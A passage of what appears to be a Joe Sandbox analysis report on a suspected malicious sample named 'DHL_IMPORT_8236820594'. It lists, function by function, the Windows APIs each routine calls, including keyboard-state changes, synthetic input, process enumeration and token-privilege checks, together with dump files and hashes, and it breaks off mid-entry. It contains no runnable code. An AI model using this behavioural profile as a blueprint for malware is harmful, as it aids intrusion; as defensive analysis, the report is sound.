                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                          • String ID:
                                                                                          • API String ID: 2652629310-0
                                                                                          • Opcode ID: 63dc76da0ef2f65c5222892e8aa669718ff9f32375747eb1773565015e38d68a
                                                                                          • Instruction ID: f4923856bf0d8e1d67ce15505fb96eebdce8a53473e4eebe546a93a2b7ccc2a4
                                                                                          • Opcode Fuzzy Hash: 63dc76da0ef2f65c5222892e8aa669718ff9f32375747eb1773565015e38d68a
                                                                                          • Instruction Fuzzy Hash: D631AD72A0020AABDF24DFA5DC45EBE7BA5FB41310B054168FC04DA291EB35DD51CBA0
                                                                                          Function 008652C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00865352
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00865375
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00865382
                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008653A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 3340791633-0
                                                                                          • Opcode ID: 91c12d4f76fd58f206adf29dbb27609bc5980673ef54e8405fe6ee899808010a
                                                                                          • Instruction ID: 0d10227da7d1e6b8dd7c67bbd86ad97aabb0c7928817d19b84984f3236ed3cb5
                                                                                          • Opcode Fuzzy Hash: 91c12d4f76fd58f206adf29dbb27609bc5980673ef54e8405fe6ee899808010a
                                                                                          • Instruction Fuzzy Hash: 8B31D034A55A0CEFEF309E14CE1ABE97761FB06B90F5A4102FA11DA3E0C7B099409B42
                                                                                          Function 0083AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0083ABF1
                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0083AC0D
                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0083AC74
                                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0083ACC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: 2d6974bbe1a211c3f2aee5f6af1f02fca918b171b88f893cd9ea6ae390a62000
                                                                                          • Instruction ID: 56fbe5f04fdd39d8a998f7e0c643f5cdcc32cad9ae0a11d8f25f45cb97dda318
                                                                                          • Opcode Fuzzy Hash: 2d6974bbe1a211c3f2aee5f6af1f02fca918b171b88f893cd9ea6ae390a62000
                                                                                          • Instruction Fuzzy Hash: 4E31E530A04618AFEB298B65C8087FA7AA5FBC5710F04621AE4C5D61D1C3758D8687D2
                                                                                          Function 00867674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ClientToScreen.USER32(?,?), ref: 0086769A
                                                                                          • GetWindowRect.USER32(?,?), ref: 00867710
                                                                                          • PtInRect.USER32(?,?,00868B89), ref: 00867720
                                                                                          • MessageBeep.USER32(00000000), ref: 0086778C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1352109105-0
                                                                                          • Opcode ID: de8a30ec417922fd22f89abc7f5c4d4cd2ef302ce14bdc63778e27131771bf5c
                                                                                          • Instruction ID: d627f47bd7fb16bbe072d6e8ddf6f5555d8cf7ecb015cc586aa4f0c988c49c2b
                                                                                          • Opcode Fuzzy Hash: de8a30ec417922fd22f89abc7f5c4d4cd2ef302ce14bdc63778e27131771bf5c
                                                                                          • Instruction Fuzzy Hash: 1E418D34605254DFEB02CF58C898EA9BBF5FB49318F1A80A9E415DB261D730A941CFD0
                                                                                          Function 008616DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 008616EB
                                                                                            • Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
                                                                                            • Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
                                                                                            • Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65
                                                                                          • GetCaretPos.USER32(?), ref: 008616FF
                                                                                          • ClientToScreen.USER32(00000000,?), ref: 0086174C
                                                                                          • GetForegroundWindow.USER32 ref: 00861752
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                          • String ID:
                                                                                          • API String ID: 2759813231-0
                                                                                          • Opcode ID: a49b271572b6eb234638484914ccbb416f1247ea2a8b89955266b83f8b108118
                                                                                          • Instruction ID: 2ec8603d83b1df80740cfe657f53067fc03a29d9d3203d2a2a3ef18babc24ca8
                                                                                          • Opcode Fuzzy Hash: a49b271572b6eb234638484914ccbb416f1247ea2a8b89955266b83f8b108118
                                                                                          • Instruction Fuzzy Hash: C0316371D00149AFCB00DFA9C885DAEBBF9FF48304B55806AE415E7312D7359E45CBA0
                                                                                          Function 0083D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0083D501
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0083D50F
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0083D52F
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0083D5DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 420147892-0
                                                                                          • Opcode ID: 3f97631f7d015320cc4c781c808bdcfb71bf90b447758896b344b2e6b8e87ef9
                                                                                          • Instruction ID: 42c8047c474ea4ac8fa92c98de953b2b5897f1e2c4031f2fa0e277bbfcb3c7d2
                                                                                          • Opcode Fuzzy Hash: 3f97631f7d015320cc4c781c808bdcfb71bf90b447758896b344b2e6b8e87ef9
                                                                                          • Instruction Fuzzy Hash: D0317E711083009FD301EF54D885AAFBBF8FFD9354F14092DF585862A1EB71A949CB92
                                                                                          Function 00868FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • GetCursorPos.USER32(?), ref: 00869001
                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00827711,?,?,?,?,?), ref: 00869016
                                                                                          • GetCursorPos.USER32(?), ref: 0086905E
                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00827711,?,?,?), ref: 00869094
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2864067406-0
                                                                                          • Opcode ID: 04f2b570f5b71bdcee56aea8950291dde7067aa391d2a9f37b3872cf7a2d0dd4
                                                                                          • Instruction ID: 3fda22aaf325c77736aa30eec50c85f4a914a10110b8a23d757c29bceae38e63
                                                                                          • Opcode Fuzzy Hash: 04f2b570f5b71bdcee56aea8950291dde7067aa391d2a9f37b3872cf7a2d0dd4
                                                                                          • Instruction Fuzzy Hash: 3921BF35601418EFDF258F94CC58EFA7BF9FB8A350F064069F9458B2A1C3719950DB61
                                                                                          Function 0083D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(?,0086CB68), ref: 0083D2FB
                                                                                          • GetLastError.KERNEL32 ref: 0083D30A
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0083D319
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0086CB68), ref: 0083D376
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2267087916-0
                                                                                          • Opcode ID: 74c9e1bf7237345976105c61de5bc759f42821414128a40fed3588a2835d57b5
                                                                                          • Instruction ID: c8cb8937367ae0015c6d0b5cffe73f8b1320d380c80293dd7f696eff8e37c3b6
                                                                                          • Opcode Fuzzy Hash: 74c9e1bf7237345976105c61de5bc759f42821414128a40fed3588a2835d57b5
                                                                                          • Instruction Fuzzy Hash: 50218D70509301DF8300DF28E88586AB7E4FE96724F104A1EF4A9C33A1E7319D4ACB93
                                                                                          Function 00831571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00831014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
                                                                                            • Part of subcall function 00831014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00831036
                                                                                            • Part of subcall function 00831014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831045
                                                                                            • Part of subcall function 00831014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083104C
                                                                                            • Part of subcall function 00831014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008315BE
                                                                                          • _memcmp.LIBVCRUNTIME ref: 008315E1
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00831617
                                                                                          • HeapFree.KERNEL32(00000000), ref: 0083161E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 1592001646-0
                                                                                          • Opcode ID: 18722d70ecb86f79172cd51d798ab36d54a3e9a3bf4f6f159ed8961502b5ae00
                                                                                          • Instruction ID: 500c555d0413e97c6fb1dbb95d9825e43cbe7945e217a975a5b2a84b2eb6430f
                                                                                          • Opcode Fuzzy Hash: 18722d70ecb86f79172cd51d798ab36d54a3e9a3bf4f6f159ed8961502b5ae00
                                                                                          • Instruction Fuzzy Hash: CA215731E00109EBDF00DFA5C949BEEB7B8FF94744F094869E441EB241E770AA05CBA0
                                                                                          Function 00862782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0086280A
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00862824
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00862832
                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00862840
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                          • String ID:
                                                                                          • API String ID: 2169480361-0
                                                                                          • Opcode ID: 4f70fab74ff935369369ac34df06c7040b8fe7bd7b417f6aff4a8e4d3ebf7556
                                                                                          • Instruction ID: 6f963bbc827a1027e8d8337d1c231f1b541030132b8737fa5aa2e0780d556b95
                                                                                          • Opcode Fuzzy Hash: 4f70fab74ff935369369ac34df06c7040b8fe7bd7b417f6aff4a8e4d3ebf7556
                                                                                          • Instruction Fuzzy Hash: EA21E031204911AFD7149B24CC45FAA7BA5FF45324F168299F426CB6E2CBB5EC42C790
                                                                                          Function 008378F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00838D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?), ref: 00838D8C
                                                                                            • Part of subcall function 00838D7D: lstrcpyW.KERNEL32(00000000,?,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00838DB2
                                                                                            • Part of subcall function 00838D7D: lstrcmpiW.KERNEL32(00000000,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?), ref: 00838DE3
                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837923
                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837949
                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837984
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                          • String ID: cdecl
                                                                                          • API String ID: 4031866154-3896280584
                                                                                          • Opcode ID: f01b3dee526633f7daa0a80142f57e218338da5806be7fee0144919feb4ca74d
                                                                                          • Instruction ID: 904d0f6c5be7bc20c10f69e1a6c2ec6c99187e6d10f2d235c93159a056683447
                                                                                          • Opcode Fuzzy Hash: f01b3dee526633f7daa0a80142f57e218338da5806be7fee0144919feb4ca74d
                                                                                          • Instruction Fuzzy Hash: 7611067A200341ABCB256F39C845E7A7BA9FF85350F00412AFC42C7364EB75D811C791
                                                                                          Function 00867CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00867D0B
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00867D2A
                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00867D42
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0084B7AD,00000000), ref: 00867D6B
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID:
                                                                                          • API String ID: 847901565-0
                                                                                          • Opcode ID: ee37d9c051bb1950c38fc820b9f1b404dc2c2a53f87970de817d213a0214f710
                                                                                          • Instruction ID: 470c6bfa446b80eab9ff46b18665d8274e4a355669607136f5696c16eff0adff
                                                                                          • Opcode Fuzzy Hash: ee37d9c051bb1950c38fc820b9f1b404dc2c2a53f87970de817d213a0214f710
                                                                                          • Instruction Fuzzy Hash: 8B11A231605615AFDB109F28DC08A7A3BA5FF46364F164B24F935C72F0E7309950CB90
                                                                                          Function 00865660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 008656BB
                                                                                          • _wcslen.LIBCMT ref: 008656CD
                                                                                          • _wcslen.LIBCMT ref: 008656D8
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00865816
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 455545452-0
                                                                                          • Opcode ID: 2be3267690836d38ac7358de32b009c356103eda06c62e091d5b0069ae8e8047
                                                                                          • Instruction ID: 96402e0715a300ce1ed6eaef6a2282d1329ffc86f7cd1d79b2f1141841309a03
                                                                                          • Opcode Fuzzy Hash: 2be3267690836d38ac7358de32b009c356103eda06c62e091d5b0069ae8e8047
                                                                                          • Instruction Fuzzy Hash: A3112671600608E6DF20DF61CC85AFE37ACFF11768F11406AFA15E6181EBB4CA80CB64
                                                                                          Function 00801D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a9580439c47402dc064823b7fad578c744f8bf6f47c5f0abddd703b48a5523f4
                                                                                          • Instruction ID: d22cd7bb11ffd51e194d6adf3ef0d97c6c4e4e7620dafa03e2cd6d2684bae237
                                                                                          • Opcode Fuzzy Hash: a9580439c47402dc064823b7fad578c744f8bf6f47c5f0abddd703b48a5523f4
                                                                                          • Instruction Fuzzy Hash: E30162B230561A7EFA9126B86CC9F67661DFF427B8F351325F921E11D2EB608C005161
                                                                                          Function 00831A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00831A47
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A59
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A6F
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
